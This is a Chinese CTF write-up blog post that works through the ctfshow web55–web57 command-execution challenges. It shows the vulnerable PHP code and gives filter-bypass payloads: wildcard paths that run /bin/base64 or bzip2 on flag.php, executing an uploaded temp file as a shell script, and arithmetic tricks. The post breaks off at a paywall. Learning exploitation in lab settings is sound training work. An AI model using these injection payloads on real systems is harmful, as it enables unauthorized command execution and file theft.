ctfshow web入门 命令执行后篇(web55-web188)

最新推荐文章于 2024-08-31 09:53:56 发布
最新推荐文章于 2024-08-31 09:53:56 发布
阅读量2k 收藏 1
点赞数 7
文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ccfly1012/article/details/120103622
版权
本文详细介绍了CTF挑战中关于Web命令执行的系列问题,从web55到web124,涵盖了各种过滤和限制条件下的命令执行技巧,包括利用base64、bzip2、文件包含、变量替代等方法来获取flag。
摘要由CSDN通过智能技术生成

目录

web55

web56

web57

web58

web59

web60

web61

web62

web63

web64

web65

web66

web67

web68-70

web71

web72

web73

web74

web75-76

web77

web118

web119

web120

web121

web122

web124

web55

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 20:03:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
// 你们在炫技吗?
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}

这个题就比较可以了,把字母过滤了,但是还保留了数字

然后解题的姿势比较可以

第一个为使用base64进行匹配

可以匹配到/bin目录下的命令

cat、cp、chmod df、dmesg、gzip、kill、ls、mkdir、more、mount、rm、su、tar、base64等

我们知道了base64,可以用通配符进行匹配命令执行进行查看flag

?c=/???/????64 flag.php
意思/bin/base64 flag.php

第二个为bzip2命令

思路是,将flag文件进行压缩,然后再访问下载

/usr/bin目录下主要放置一些应用软件工具必备的执行档

c++、g++、gcc、chdrv、diff、dig、du、eject、elm、free、gnome、 zip、htpasswd、kfm、ktop、last、less、locale、m4、make、man、mcopy、ncftp、 newaliases、nslookup passwd、quota、smb、wget等

其中,我们可以利用/usr/bin下的bzip2

?c=/???/???/????2 ????.???
/usr/bin/bzip2 flag.php

第三个运用.(进行)执行sh命令

再之前我们要上传post文件数据包

源码如下

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>POST数据包POC</title>
</head>
<body>
<form action="http://ae82ef6f-deed-491d-bebf-7498e32cc9b1.challenge.ctf.show:8080/" method="post" enctype="multipart/form-data">
<!--链接是当前打开的题目链接-->
    <label for="file">文件名:</label>
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="提交">
</form>
</body>
</html>

然后抓包,执行poc执行命令

?c=.+/???/????????[@-[]

添加sh命令就可

#!/bin/sh
ls

具体这个方法,我还没大学懂,还得继续努力

web56

 <?php
​
/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
// 你们在炫技吗?
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}

此题和上一题一样,但是数字也被过滤掉了,需要上传POST数据文件

然后,上传后抓包

?c=.+/???/????????[@-[]

再执行sh命令

#!/bin/sh
ls
#!/bin/sh
tac flag.php

web57

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-08 01:02:56
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
​
// 还能炫的动吗?
//flag in 36.php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|[0-9]|\`|\|\#|\'|\"|\`|\%|\x09|\x26|\x0a|\>|\<|\.|\,|\?|\*|\-|\=|\[/i", $c)){
        system("cat ".$c.".php");
    }
}else{
    highlight_file(__FILE__);
}

过滤掉了许多东西,但是最后只需要让我们让c等于36即可

payload:

1.

$(())输出0,数学运算
~$(())输出~0
$((~$(())))输出-1
所以再这我们只需要让36个-1相加再取反
$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~
$(()
最低0.47元/天 解锁文章
parkour-
关注
web渗透--18--跨站请求伪造(CSRF)
武天旭的博客
09-12 1834
1、漏洞描述 跨站请求伪造攻击,Cross-Site Request Forgery(CSRF),攻击者在用户浏览网页时,利用页面元素(例如img的src),强迫受害者的浏览器向Web应用服务器发送一个改变用户信息的HTTP请求(恶意用户没有操作权限,于是构造操作链接让有权限的用户去执行,以此实现期望操作)。 CSRF攻击可以从站外和站内发起。 从站...
ctfshow web55
snowlyzz的博客
05-30 915
/* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 20:03:51 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // 你们在炫技吗? if(isset($_GET['c'])){ $c=$_GET['c..
CTFshow web55
ChenD的学习笔记
11-10 1248
CTFshow web55
ctfshow之web55~web57(无字母的rce)
最新发布
qq_1182418846的博客
08-31 1178
声明:本章内容是引荐几位师傅的博客,然后根据自己的理解编写而成。
CTFshow 命令执行 web55
Kradress的博客
11-20 292
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 20:03:51 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // 你们在炫技吗? if(isset($_GET[
CTFSHOW web入门 web55
NNASJ的博客
01-31 364
需要注意的是Linux 系统下 php 接收上传文件的 post 包,默认会将文件保存在临时文件夹 /tmp/,文件名 phpXXXXXX,后面为随机字母,即:/tmp/phpXXXXXX。),数字,和点(.),但对点(.)的作用和用途不清楚,上网搜索了。发现可以采用通配符进行筛选,所以使用/bin目录下的base64进行匹配。在网上找到了大佬的另一种解题思路,通过上传文件,得到flag。如果要上传的文件能执行内容,需要添加内容/bin/sh。需要注意的是上传的时候文件名不一定是大写,要多上传几次。
CTFshow web入门 sql web188-246
Je3Z的博客
04-15 2686
web188 在where username=0这样的查询中,因为username都会是字符串,在mysql中字符串与数字进行比较的时候,以字母开头的字符串都会转换成数字0,因此这个where可以把所有以字母开头的数据查出来。 而password=0的原因在于这里: if($row['pass']==intval($password)){ 没错。。。弱类型比较,看来查出来的pass也都是以字母开头的,所以password=0可以成功弱类型比较,得到flag。 ...
ctfshow web入门 PHP特性后篇(web133-web150)
ccfly1012的博客
09-13 1958
目录 web133 web134 web135 web136 web137 web138 web139 web140 web141 web142 wen143 web144 web145-web150 web133 error_reporting(0); highlight_file(__FILE__); //flag.php if($F = @$_GET['F']){ if(!preg_match('/system|nc|wget|exec|passthru|net
ctfshow web134
08-09
- *2* [ctfshow web入门 PHP特性后篇(web133-web150)](https://blog.csdn.net/ccfly1012/article/details/120273775)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
巨量引擎-抖音上的80后、90后、00后 之 00后篇-2019.8-15页.pdf
09-15
### 巨量引擎-抖音上的80后、90后、00后 之 00后篇 #### 数据背景及方法论 本报告由巨量引擎商业算数中心出品,旨在通过分析2018年12月至2019年6月期间的数据来深入探讨抖音平台上00后用户的兴趣爱好、行为习惯...
无字母数字的命令执行(ctfshow web入门 55
热门推荐
Firebasky的博客
09-10 1万+
这几天都没有怎么学习,基本上都是复习学科知识,因为我们要期末考试。刚刚好今天有时间来做了一道命令执行的题,再一次拜读了 p神的文章。受益匪浅。 直接进入正题 源代码 <?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 20:03:51 # @email: h1x.
ctfshow Web55 只用符号的命令执行
qq_37301470的博客
06-13 433
命令执行的神奇方法 上传php临时文件,并用 . 来访问 复现一下,思路参考网上大佬的
CTFshow web 入门55
li_n_k的博客
11-11 273
CTFshow web 入门55
ctfshow web118
v2ish1yan的博客
05-19 489
第一次见这种方法 进入靶场 查看源码 知道了我们是往code传参,然后system执行代码 但是我在执行一些代码的时候,并不会回显,应该是被禁了。 这里使用了linux系统变量构成命令执行的方法 我们要构造nl命令来查看flag 看题目给的hint 貌似是想说这个系统变量${PATH}只有bin这一个文件夹 假如 ${PATH} 为abcdef 那么 ${PATH:3} def ${PATH:~0} f ${PATH:~A} f //A是字符串转换为数字为0 所
ctfshow-web入门-命令执行web53-web55
Welcome To Myon'Blog !
06-10 1318
这里的代码有点不一样,说一下这两种的区别:(1)直接执行 system($c);这种方式会直接执行命令 $c 并将命令的输出直接发送到标准输出(通常是浏览器);不会返回命令的输出值,因此不能对输出结果进行进一步处理。(2)使用一个参数来接受 system 的返回值后再输出它这种方式不仅会执行命令 $c,而且会将命令的最后一行输出结果赋值给变量 $d;然后通过 echo "".$d;将变量 $d 的内容输出到标准输出;
[ctfshow]web入门——命令执行web118-web122+web124)
ShenZ的博客
02-28 3859
[ctfshow]web入门——命令执行 文章目录[ctfshow]web入门——命令执行web118web119web120web121web122web124 web118 源码里有提示 非法输入会有evil input fuzz一下发现可以用大写字母A-Z和${}~.?: # echo ${PWD} /root # echo ${PWD:0:1} #表示从0下标开始的第一个字符 / # echo ${PWD:~0:1} #从结尾开始往前的第一个字符
ctfshow web入门55~122 命令执行
qq_53063436的博客
10-14 2403
<?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 20:03:51 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // 你们在炫技吗? if(isset($_GET['c'])){ $c=
ctfshow-web入门-sql注入(web186-web190)
Welcome To Myon'Blog !
08-06 1298
在上一题中我们提到了,使用 true+true 的方法构造出数字比如 true+true+true 就可以构造出 3,再使用 char 函数将数字转为对应的 ASCII 字符,最终实现我们 payload 的转换。在 SQL 中,数字和字符串的比较是弱类型的,如果在比较操作中涉及到字符串和数字,SQL 会尝试将字符串转换为数字,那么只要字符串不是以数字开头,比较时都会转为数字 0。拿到 flag:ctfshow{e54220e0-e81f-4e0e-ad32-0bbbbdd43d83}
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值